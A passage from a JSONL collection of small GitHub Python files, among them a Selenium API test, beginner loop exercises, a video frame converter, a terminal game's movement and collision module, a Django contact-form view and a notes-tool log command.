diffie_hellman_key_exchange()","repo_name":"untble/uni-crypto","sub_path":"lab8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70276189980","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxOptions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nopts = FirefoxOptions()\nopts.add_argument(\"--headless\")\ndriver = webdriver.Firefox(firefox_options=opts)\n# Get the homepage\ndriver.get(\"http://172.28.5.2:80\")\nprint(driver.title)\nprint(driver.current_url)\nassert \"Data API test harness\" in driver.title\nprint(\"Clicking init button\")\ninit_elem = driver.find_element_by_xpath(\"//input[@name='init']\")\ninit_elem.click()\nassert \"init\" in driver.current_url\nassert \"csv loaded\" in driver.page_source\nfor i in range(0, 9):\n print(\"Clicking listCust button\")\n cust_elem = driver.find_element_by_xpath(\"//input[@name='listCust']\")\n cust_elem.click()\n assert \"listCust\" in driver.current_url\n assert \"customer\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[4]\").text\n print(\"Clicking listProd button\")\n prod_elem = driver.find_element_by_xpath(\"//input[@name='listProd']\")\n prod_elem.click()\n assert \"listProd\" in driver.current_url\n assert \"product\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[4]\").text\n print(\"Clicking listTotal button\")\n total_elem = driver.find_element_by_xpath(\"//input[@name='listTotal']\")\n total_elem.click()\n assert \"listTotal\" in driver.current_url\n assert \"Australia\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[5]\").text\ndriver.close()\n","repo_name":"c12k/ttyd-intern-project","sub_path":"devops/Test-scripts/data-tests/test_data_api.py","file_name":"test_data_api.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70056866460","text":"class Node:\n\tdef __init__(self, weights, offset):\n\t\tself.weights = weights\n\t\tself.offset = offset\n\t\n\t# map inputs v_i's (0's and 1's) from input list x and weights to an output 0 or 1\n\tdef eval(self, inputList):\n\t\ttotal = self.offset\n\t\tfor w,v in zip(self.weights, inputList):\n\t\t\ttotal += w*v\n\t\treturn 1 if total > 0 else 0 #ternary\n\nned = Node([-0.5, -0.5], 0)\nprint(ned.eval([1, 1])) # need 0\nprint(ned.eval([1, 0])) # need 1\nprint(ned.eval([0, 1])) # need 1\nprint(ned.eval([0, 0])) # need 0\n\n# use many nodes (maybe 3 or more) to make x04\n\n\n","repo_name":"ornaverum/ICS2019_2020","sub_path":"NN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9311321173","text":"\"\"\"\n@author: Tristan Chevreau\n\nA converter for transforming mp4 videos to jpg grayscales.\n\nInput :\n- mp4 video\n\nOutput :\n- a jpg grayscale for each frame, usable for OCR, whose name is its frame number.\n- a pickle file linking the image file name to the timestamp.\n\"\"\"\n\nimport os\nimport cv2\nimport pickle\nfrom tkinter.filedialog import askopenfilename\n\nfrom data.constants import timestamps_filename\n\n\ndef progress_bar(percent, length=20):\n \"\"\" This displays a progress bar in command-line, erasing the last line.\n :param percent: the percentage at which the progress bar is full\n :param length: the size of the progress bar\n :return: None\n \"\"\"\n str_ = \"#\" * int(length*percent/100)\n while len(str_) < length:\n str_ += \"-\"\n n, d = str(round(percent, 2)).split(\".\")\n print(f\"[step1][{n.zfill(2)}.{d.ljust(2, '0')}%] converting ... [{str_}]\", end='\\r')\n\n\ndef step1_conversion(file_name, folder_name, callback=lambda r: None):\n \"\"\" This function contains all the things to execute during step1.\n :param file_name: the name of the .mp4 file to convert.\n :param folder_name: the folder in which to save the frames.\n :param callback: the function to call to update a display.\n :return: None\n \"\"\"\n # create the folder\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n # open the video\n cap = cv2.VideoCapture(file_name)\n video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT)) - 1\n count = 0\n timestamps = {}\n # read it until the end\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret: # if the frame was not kept ...\n continue # ... ignore it\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n timestamps[f\"{count:08d}.jpg\"] = cap.get(cv2.CAP_PROP_POS_MSEC)\n cv2.imwrite(folder_name + \"/\" + f\"{count:08d}\" + \".jpg\", gray)\n count += 1\n if count > (video_length - 1): # if we read all the frames ...\n cap.release() # ... close the video\n callback(count / video_length * 100)\n # save the timestamps\n with open(folder_name + timestamps_filename, \"wb\") as f:\n pickle.dump(timestamps, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__==\"__main__\":\n\n print(\"[step1] choose the path of the video\")\n video_path = askopenfilename(filetypes=[(\"MPEG4 File\", \"*.mp4\")])\n if video_path == \"\":\n raise ValueError(\"you did not enter a filepath\")\n print()\n\n print()\n print(\"[step1] beginning conversion ...\")\n print()\n\n step1_conversion(video_path, \".\".join(video_path.split(\".\")[:-1]), callback=progress_bar)\n print(f\"[step1] > {video_path} was converted to jpg grayscales and timestamps pickle\")\n print()\n","repo_name":"trischevreau/Frame-Coupler","sub_path":"step1_converter.py","file_name":"step1_converter.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74522273818","text":"# 1\n#\nlimit = list(range(11))\n\nfor num in limit:\n pass\n # print(num)\n\nnum = 0\nwhile num < 10:\n # print(num)\n num = num + 1\n\n# 2\n\ndigit = 10\ndigitToRange = list(range(digit))\n# while digit > 0:\n# # print(digit)\n# # digit -= 1\n\n# COMING BACK\nfor num in digitToRange:\n pass\n # print(num)\n\n\n# 3 - 5\n\n\n# 6\nlanguage = ['Python', 'Numpy','Pandas','Django', 'Flask']\nfor lang in language:\n pass\n # print(lang)\n\n# 7\n\nto_hundred = list(range(101))\n\nfor num in to_hundred:\n if num % 2 == 0:\n pass\n # print(num)\n else:\n pass\n # print(num)\n\n# 8\n\n\nfor num in to_hundred:\n if num % 2 != 0:\n # print(num)\n pass\n\n\n# 9\n\ntotal = 0\nfor num in to_hundred:\n total = num + total\nelse:\n # print(f\"The sum of all numbers is {total}\")\n pass\n\n\n# 10\nodds = 0\neven = 0\n\nfor num in to_hundred:\n if num % 2 == 0:\n even = num + even\n else:\n odds = num + odds\nelse:\n print(f\"The sum of all evens is {even}, and the sum for all odds is {odds}\")\n\n# 11\ncountries = [\n 'Afghanistan',\n 'Albania',\n 'Algeria',\n 'Andorra',\n 'Angola',\n 'Antigua and Barbuda',\n 'Argentina',\n 'Armenia',\n 'Australia',\n 'Austria',\n 'Azerbaijan',\n 'Bahamas',\n 'Bahrain',\n 'Bangladesh',\n 'Barbados',\n 'Belarus',\n 'Belgium',\n 'Belize',\n 'Benin',\n 'Bhutan',\n 'Bolivia',\n 'Bosnia and Herzegovina',\n 'Botswana',\n 'Brazil',\n 'Brunei',\n 'Bulgaria',\n 'Burkina Faso',\n 'Burundi',\n 'Cambodia',\n 'Cameroon',\n 'Canada',\n 'Cape Verde',\n 'Central African Republic',\n 'Chad',\n 'Chile',\n 'China',\n 'Colombi',\n 'Comoros',\n 'Congo (Brazzaville)',\n 'Congo',\n 'Costa Rica',\n \"Cote d'Ivoire\",\n 'Croatia',\n 'Cuba',\n 'Cyprus',\n 'Czech Republic',\n 'Denmark',\n 'Djibouti',\n 'Dominica',\n 'Dominican Republic',\n 'East Timor (Timor Timur)',\n 'Ecuador',\n 'Egypt',\n 'El Salvador',\n 'Equatorial Guinea',\n 'Eritrea',\n 'Estonia',\n 'Ethiopia',\n 'Fiji',\n 'Finland',\n 'France',\n 'Gabon',\n 'Gambia, The',\n 'Georgia',\n 'Germany',\n 'Ghana',\n 'Greece',\n 'Grenada',\n 'Guatemala',\n 'Guinea',\n 'Guinea-Bissau',\n 'Guyana',\n 'Haiti',\n 'Honduras',\n 'Hungary',\n 'Iceland',\n 'India',\n 'Indonesia',\n 'Iran',\n 'Iraq',\n 'Ireland',\n 'Israel',\n 'Italy',\n 'Jamaica',\n 'Japan',\n 'Jordan',\n 'Kazakhstan',\n 'Kenya',\n 'Kiribati',\n 'Korea, North',\n 'Korea, South',\n 'Kuwait',\n 'Kyrgyzstan',\n 'Laos',\n 'Latvia',\n 'Lebanon',\n 'Lesotho',\n 'Liberia',\n 'Libya',\n 'Liechtenstein',\n 'Lithuania',\n 'Luxembourg',\n 'Macedonia',\n 'Madagascar',\n 'Malawi',\n 'Malaysia',\n 'Maldives',\n 'Mali',\n 'Malta',\n 'Marshall Islands',\n 'Mauritania',\n 'Mauritius',\n 'Mexico',\n 'Micronesia',\n 'Moldova',\n 'Monaco',\n 'Mongolia',\n 'Morocco',\n 'Mozambique',\n 'Myanmar',\n 'Namibia',\n 'Nauru',\n 'Nepal',\n 'Netherlands',\n 'New Zealand',\n 'Nicaragua',\n 'Niger',\n 'Nigeria',\n 'Norway',\n 'Oman',\n 'Pakistan',\n 'Palau',\n 'Panama',\n 'Papua New Guinea',\n 'Paraguay',\n 'Peru',\n 'Philippines',\n 'Poland',\n 'Portugal',\n 'Qatar',\n 'Romania',\n 'Russia',\n 'Rwanda',\n 'Saint Kitts and Nevis',\n 'Saint Lucia',\n 'Saint Vincent',\n 'Samoa',\n 'San Marino',\n 'Sao Tome and Principe',\n 'Saudi Arabia',\n 'Senegal',\n 'Serbia and Montenegro',\n 'Seychelles',\n 'Sierra Leone',\n 'Singapore',\n 'Slovakia',\n 'Slovenia',\n 'Solomon Islands',\n 'Somalia',\n 'South Africa',\n 'Spain',\n 'Sri Lanka',\n 'Sudan',\n 'Suriname',\n 'Swaziland',\n 'Sweden',\n 'Switzerland',\n 'Syria',\n 'Taiwan',\n 'Tajikistan',\n 'Tanzania',\n 'Thailand',\n 'Togo',\n 'Tonga',\n 
'Trinidad and Tobago',\n 'Tunisia',\n 'Turkey',\n 'Turkmenistan',\n 'Tuvalu',\n 'Uganda',\n 'Ukraine',\n 'United Arab Emirates',\n 'United Kingdom',\n 'United States',\n 'Uruguay',\n 'Uzbekistan',\n 'Vanuatu',\n 'Vatican City',\n 'Venezuela',\n 'Vietnam',\n 'Yemen',\n 'Zambia',\n 'Zimbabwe',\n];\n\nfor country in countries:\n if \"land\" in country:\n print(country)\n\n\n\n\n# 12\nfruit = ['banana', 'orange', 'mango', 'lemon']\nfruit.reverse();\nprint(fruit)","repo_name":"auleki/30days_of_python","sub_path":"day_10/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"75022306139","text":"# -*- coding: utf-8 -*-\n\n#file containing definition of \"Item\" type : base for all object which will move\n\n#search for tag \"#PERFORMANCE\" to see which lines can be commented to increase performances\n\nimport Object #importation of base type\nimport Tools\n\nimport sys\nimport time\n\n\nattributesList = [\"datas\",\"x\",\"y\",\"width\",\"height\",\"color\",\"vX\",\"vY\",\"aX\",\"aY\",\"sprites\"]\n#datas,x,y,width,height,color : see Object.py\n#vX : float : item x speed\n#vY : float : item y speed\n#aX : float : item x acceleration\n#aY : float : item y acceleration\n#sprites : list : list of 2D arrays to replace \"datas\" and print differents appearances function of state\n\n##########################\n#\n#\tConstructor\n#\n##########################\n\ndef Item(datas,x = 0, y = 0, color = None,vX=0,vY=0,aX=0,aY=0):\n\tassert type(vX) is float or type(vX) is int\n\tassert type(vY) is float or type(vY) is int\n\tassert type(aX) is float or type(aX) is int\n\tassert type(aY) is float or type(aY) is int\n\n\tbase = Object.Object(datas,x,y,color)\n\tbase[\"sprites\"] = [datas] #sprites[0] will always be base data\n\tbase[\"vX\"] = float(vX)\n\tbase[\"vY\"] = float(vY)\n\tbase[\"aX\"] = float(aX)\n\tbase[\"aY\"] = float(aY)\n\n\treturn base\n\n##########################\n#\n#\tProcedures\n#\n##########################\n\ndef assertItem(item):\n\tassert type(item) is dict\n\tfor i in range(0,len(attributesList)):\n\t\tassert attributesList[i] in item.keys(),\"\\\"Item\\\" type expect %r key.\"%attributesList[i]\n\n\treturn True #return true if \"item\" is a correct \"Item\"\n\ndef move(item,dt): #procedure to define new position of the item\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\n\tx = Object.getX(item) #get item X position\n\ty = Object.getY(item) #get item Y position\n\n\t#change item speed\n\titem[\"vX\"] += dt*item[\"aX\"]\n\titem[\"vY\"] += dt*item[\"aY\"]\n\n\tx+=dt*item[\"vX\"] #set possible future object position\n\ty+=dt*item[\"vY\"]\n\n\tObject.setX(item,x)#x changes\n\tObject.setY(item,y)#y changes\n\ndef tryCollide(item1,item2,coordinatesCheckOnly = False):\n\t\"\"\"\n\tIs 2 items colliding ?\n\t@param item1: Object of type \"Item\"\n\t@type item1: dict\n\n\t@param item2: Object of type \"Item\"\n\t@type item2: dict\n\n\t@param coordinatesCheckOnly: Should we only analyse coordinates ? (faster but less precise)\n\t@type coordinatesCheckOnly: bool\n\n\t@return: Are item1 and item2 colliding ? 
Yes:True No:False\n\t@rtype: bool\n\t\"\"\"\n\n\tassertItem(item1)\n\tassertItem(item2)\n\n\twidth1 = Object.getWidth(item1)\n\theight1 = Object.getHeight(item1)\n\tx1 = Object.getX(item1)\n\ty1 = Object.getY(item1)\n\n\twidth2 = Object.getWidth(item2)\n\theight2 = Object.getHeight(item2)\n\tx2 = Object.getX(item2)\n\ty2 = Object.getY(item2)\n\n\t\"\"\"tempList = [item1,item2]\n\n\tx1,y1 = int(round(Object.getX(item1))),int(round(Object.getY(item1)))\n\tx2,y2 = int(round(Object.getX(item2))),int(round(Object.getY(item2)))\n\n\tsmallerIndex = 0 if width1*height1 < width2*height2 else 1 #search which item is the smaller \"\"\"\n\n\tstartX1,startX2,startY1,startY2 = 0,0,0,0\n\tendX1,endX2,endY1,endY2 = 0,0,0,0\n\tforWidth,forHeight = 0,0\n\n\tif((x1+width1 < x2) or (x2+width2 < x1)): #if objects are not colliding on xS\n\t\treturn False\n\n\t#x tests\n\t#Tools.prDly(\"TESTS on X :\")\n\tif(x2 <= x1 and x2+width2 <= x1+width1): #if object potentially collide on x #CASE 1\n\t\tstartX1=0;startX2=int(round(x1-x2))\n\t\tendX2=width2-1;endX1=width2-startX2-1\n\t\tforWidth = endX2-startX2\n\t\t#Tools.prDly(\"Cas 1 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 <= x1 and x2+width2 >= x1+width1): #CASE 2\n\t\tstartX1=0;startX2=int(round(x1-x2))\n\t\tendX1=width1-1;endX2=startX2+width1-1\n\t\tforWidth = width1-1\n\t\t#Tools.prDly(\"Cas 2 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 >= x1 and x2+width2 >= x1+width1): #CASE 3\n\t\tstartX1=int(round(x2-x1));startX2=0\n\t\tendX1=width1-1;endX2=width1-startX1-1\n\t\tforWidth = endX1-startX1\n\t\t#Tools.prDly(\"Cas 3 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telif(x2 >= x1 and x2+width2 <= x1+width1): #CASE 4\n\t\tstartX2 = 0;endX2 = width2-1\n\t\tstartX1 = int(round(x2-x1));endX1 = startX1+width2-1\n\t\tforWidth = width2-1\n\t\t#Tools.prDly(\"Cas 4 :\\n\"+str(startX1)+\";\"+str(endX1)+\"\\n\"+str(startX2)+\";\"+str(endX2))\n\telse:\n\t\treturn False\n\n\n\t#y tests\n\t#Tools.prDly(\"TESTS on Y :\")\n\tif(y2 <= y1 and y2+height2 <= y1+height1): #if object potentially collide on x #CASE 1\n\t\tstartY1=0;startY2=int(round(y1-y2))\n\t\tendY2=height2-1;endY1=height2-startY2-1\n\t\tforHeight = endY2-startY2\n\t\t#Tools.prDly(\"Cas 1 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 <= y1 and y2+height2 >= y1+height1): #CASE 2\n\t\tstartY1=0;startY2=int(round(y1-y2))\n\t\tendY1=height1-1;endY2=startY2+height1-1\n\t\tforHeight = height1-1\n\t\t#Tools.prDly(\"Cas 2 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 >= y1 and y2+height2 >= y1+height1): #CASE 3\n\t\tstartY1=int(round(y2-y1));startY2=0\n\t\tendY1=height1-1;endY2=height1-startY1-1\n\t\tforHeight = endY1-startY1\n\t\t#Tools.prDly(\"Cas 3 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telif(y2 >= y1 and y2+height2 <= y1+height1): #CASE 4\n\t\tstartY2 = 0;endY2 = height2-1\n\t\tstartY1 = int(round(y2-y1));endY1 = startY1+height2-1\n\t\tforHeight = height2-1\n\t\t#Tools.prDly(\"Cas 4 :\\n\"+str(startY1)+\";\"+str(endY1)+\"\\n\"+str(startY2)+\";\"+str(endY2))\n\telse:\n\t\treturn False\n\n\tforWidth += 1 #correct the transition from coordinates to value\n\tforHeight += 1 #correct the transition from coordinates to value\n\t#Tools.prDly(\"\\n\\n\"+str(forWidth)+\";\"+str(forHeight))\n\n\tif(forWidth != 0 and forHeight != 0):\n\t\tif(coordinatesCheckOnly):\n\t\t\t#Tools.prDly(\"CHECK COO 
ONLY\")\n\t\t\treturn True\n\t\telse:\n\t\t\tfor i in range(0,forWidth):\n\t\t\t\tfor j in range(0,forHeight):\n\t\t\t\t\tdata1 = Object.getDataAt(item1,i+startX1,j+startY1)\n\t\t\t\t\tdata2 = Object.getDataAt(item2,i+startX2,j+startY2)\n\t\t\t\t\tif(data1 != '' and data1 != ' ' and data2 != '' and data2 != ' '):\n\t\t\t\t\t\treturn True\n\n\treturn False\n\n\n##########################\n#\n#\tGetters\n#\n##########################\n\n#----- Speed\n\ndef getVX(item): #get item x speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"vX\"]\n\ndef getVY(item): #get item y speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"vY\"]\n\n#----- Acceleration\n\ndef getAX(item): #get item x acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"aX\"]\n\ndef getAY(item): #get item y acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"aY\"]\n\n#----- Sprites\n\ndef getSprites(item): #get item list of sprites\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn item[\"sprites\"]\n\ndef getSpritesCount(item):\n\t\"\"\"\n\tGet \\\"item\\\" number of sprites\n\t@param item: object of type \\\"Item\\\"\n\t@type item: dict\n\n\t@return: \\\"item\\\" number of sprites\n\t@rtype: int\n\t\"\"\"\n\tassertItem(item)\n\n\treturn len(item[\"sprites\"])\n\ndef getSpriteAt(item,index): #get item sprite at index \"index\" in [\"sprites\"] list attribute\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. 
It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\treturn item[\"sprites\"][index]\n\n#----- Size\n\ndef getBaseWidth(item):\n\t\"\"\"\n\t@param item: Dictionnary containing all information about one Item object\n\t@type item: dict\n\t@return: Return width of sprite[0] <=> width of base datas\n\t@rtype: int\n\t\"\"\"\n\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn len(item[\"sprites\"][0][0])\n\ndef getBaseHeight(item):\n\t\"\"\"\n\t@param item: Dictionnary containing all information about one Item object\n\t@type item: dict\n\t@return: Return height of sprite[0] <=> height of base datas\n\t@rtype: int\n\t\"\"\"\n\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\treturn len(item[\"sprites\"][0])\n\n\n##########################\n#\n#\tSetters\n#\n##########################\n\n#----- Speed\n\ndef setVX(item,vX): #set item x speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(vX) is int or type(vX) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"vX\"] = float(vX)\n\treturn 0\n\ndef setVY(item,vY): #set item y speed\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(vY) is int or type(vY) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"vY\"] = float(vY)\n\treturn 0\n\n#----- Acceleration\n\ndef setAX(item,aX): #set item x acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(aX) is int or type(aX) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"aX\"] = float(aX)\n\treturn 0\n\ndef setAY(item,aY): #set item y acceleration\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(aY) is int or type(aY) is float #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"aY\"] = float(aY)\n\treturn 0\n\n#----- Sprites\n\ndef addSprite(item,sprite): #add a sprite at the end of the sprite list\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tObject.assertDatas(sprite) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\titem[\"sprites\"].append(sprite) #add sprite at the list\n\treturn 0\n\ndef removeSprite(item,index): #remove sprite designated in the list by index \"index\"\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. 
It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\tdel item[\"sprites\"][index]\n\treturn 0\n\ndef setSprite(item,index): #set which sprite to be displayed on screen\n\tassertItem(item) #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert type(index) is int #PERFORMANCE --> comment this line to increase performances (use carefully)\n\tassert index >=0 and index < len(item[\"sprites\"]),\"Index out of range. It have to be in [0;%r] and current try is : %r\" % (len(item[\"sprites\"]),index)\n\t\t #PERFORMANCE --> comment this line (upper) to increase performances (use carefully)\n\tObject.setDatas(item,item[\"sprites\"][index])\n\treturn 0\n\n\n\n\n\n##########################\n#\n#\tinternal tests\n#\n##########################\n\nif(__name__ == \"__main__\"):\n\n\t#it = Item([[0,1,2,3,4,5],[1,0,0,0,0,1],[2,0,0,0,0,2],[3,0,0,0,0,3],[4,0,0,0,0,4],[5,0,0,0,0,5]],28,5,[255,255,255])\n\t#it = Item([[0,1,2,3,4,5]],28,5,[255,255,255])\n\t#it = Item([[0,'','','','',''],[1,0,'','','',''],[2,0,0,'2','',''],[3,0,0,0,'2',''],[4,0,0,0,0,'2'],[5,0,0,0,0,5]],28,5,[255,255,255])\n\n\t#it2 = Item([[0,1,2,3,4,5,6,7,8],[1,0,0,0,0,0,0,0,1],[2,0,0,0,0,0,0,0,2],[3,0,0,0,0,0,0,0,3]],29,4,[0,255,0])\n\t#it2 = Item([[0,1,2],[1,0,0]],30,8,[0,255,0])\n\t#it2 = Item([[0,1,2,3,4,5,6,7,8],['',0,0,0,0,0,0,0,1],['','',0,0,0,0,0,0,2],['','','',0,0,0,0,0,3]],28,4,[0,255,0])\n\n\tprint(\"Is it a correct Item type ? : \"+str(assertItem(it)))\n\tprint(\"x speed : \"+str(getVX(it)))\n\tprint(\"y speed : \"+str(getVY(it)))\n\tprint(\"x acceleration : \"+str(getAX(it)))\n\tprint(\"y acceleration : \"+str(getAY(it)))\n\tprint(\"Sprite 0 = \"+str(getSpriteAt(it,0))) #display base data\n\tmove(it,0.08)\n\tprint(\"\")\n\tprint(\"\")\n\tprint(\"x speed : \"+str(getVX(it)))\n\tprint(\"y speed : \"+str(getVY(it)))\n\tprint(\"x acceleration : \"+str(getAX(it)))\n\tprint(\"y acceleration : \"+str(getAY(it)))\n\tprint(\"Sprite 0 = \"+str(getSpriteAt(it,0))) #display base data\n\n\tTools.sysExec(\"clear\")\n\n\tObject.show(it)\n\tObject.show(it2)\n\tTools.goAt(1,1)\n\tprint(tryCollide(it,it2))","repo_name":"Cypher-0/projet-IPI","sub_path":"PyTry/Item.py","file_name":"Item.py","file_ext":"py","file_size_in_byte":12364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2877362977","text":"\"\"\"\nCP1404/CP5632 - Practical\nRandom word generator - based on format of words\nAnother way to get just consonants would be to use string.ascii_lowercase\n(all letters) and remove the vowels.\n\"\"\"\nimport random\n\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\n#word_format = input(\"Enter Word Format: \")\nsize = random.randint(1,10)\nrandlist=[]\nword_format = ''\nprint(size)\nfor i in range(size):\n option = random.randint(0,1)\n print(option)\n if(option == 0):\n randlist.append(random.choice(VOWELS))\n print(randlist)\n elif(option == 1):\n randlist.append(random.choice(CONSONANTS))\nword_format = word_format.join(randlist)\nword_format = word_format.lower()\nword = \"\"\nfor kind in word_format:\n if kind == \"#\":\n word += random.choice(VOWELS)\n elif kind == \"%\":\n word += random.choice(CONSONANTS)\n else:\n word += random.choice(VOWELS)\n\nprint(word)","repo_name":"vishmango117/CP1404-Practicals","sub_path":"Week 2/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14101786102","text":"from django.shortcuts import render, redirect\nfrom .models import Query\n\n# Create your views here.\ndef home(request):\n\tif request.method == \"POST\" :\n\t\tname = request.POST.get(\"name\")\n\t\temail = request.POST.get(\"email\")\n\t\tsubject = request.POST.get(\"subject\")\n\t\tmessage = request.POST.get(\"message\")\n\n\t\tquery = Query(name = name, email = email, message = message, subject = subject)\n\t\tquery.save()\n\t\treturn redirect(\"/\")\n\telse:\n\t\treturn render(request, \"index.html\")\n","repo_name":"Abhaysaxena100/my_portfolio","sub_path":"formapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20190192154","text":"from datetime import datetime, date\nfrom decimal import Decimal\n\n\ndef standardize(val):\n if val is None:\n return None\n if isinstance(val, int):\n return str(val)\n if isinstance(val, str) or isinstance(val, unicode):\n return val.strip().lower()\n if isinstance(val, datetime):\n return val.strftime('%Y-%m-%d %H:%M:%S.%f')\n if isinstance(val, date):\n return val.strftime('%Y-%m-%d')\n if isinstance(val, Decimal) or isinstance(val, float):\n return str(round(val, 2))\n raise Exception('Couldn\\'t standardize \"%s\" (type %s)' % (val, type(val)))\n\n\ndef weekday_fields(val):\n \"\"\"\n Returns a 2-tuple containing:\n 1) The Python weekday value for the date passed (Monday == 0 ... Sunday == 6)\n 2) A boolean indicating whether the date is on the weekend (Saturday/Sunday)\n \"\"\"\n assert isinstance(val, datetime) or isinstance(val, date) # Actually a datetime is an instance of a date, so the first condition isn't necessary...\n return val.weekday(), val.weekday() in (5, 6)\n","repo_name":"mattklein/persfin","sub_path":"src/persfin/ml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42186416299","text":"import click\nimport rvo.db as db\nimport rvo.views as views\n\n@click.command(short_help=\"Show transactions\",\n help=\"\"\"\n Transactions are logged informations\n about changes and access to the documents.\n\n `log' is used to get those transactions listed.\n\n Having a hard time remembering what you did?\n \"\"\")\n@click.option('entries', '-e', '--entries', default=15, type=int,\n help='Number of entries being shown')\n@click.pass_context\ndef log(ctx, entries):\n \"\"\"\n Shows n latest transactions\n :n: int\n :returns: bool\n \"\"\"\n coll = db.get_transactions_collection(ctx)\n\n SUM = {}\n c = 0\n print(\"\")\n for doc in coll.find({}).sort(\"date\", -1).limit(entries):\n c += 1\n SUM[c] = doc\n\n views.transactions(SUM, c+1)\n\n return True\n\n","repo_name":"noqqe/rvo","sub_path":"rvo/commands/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
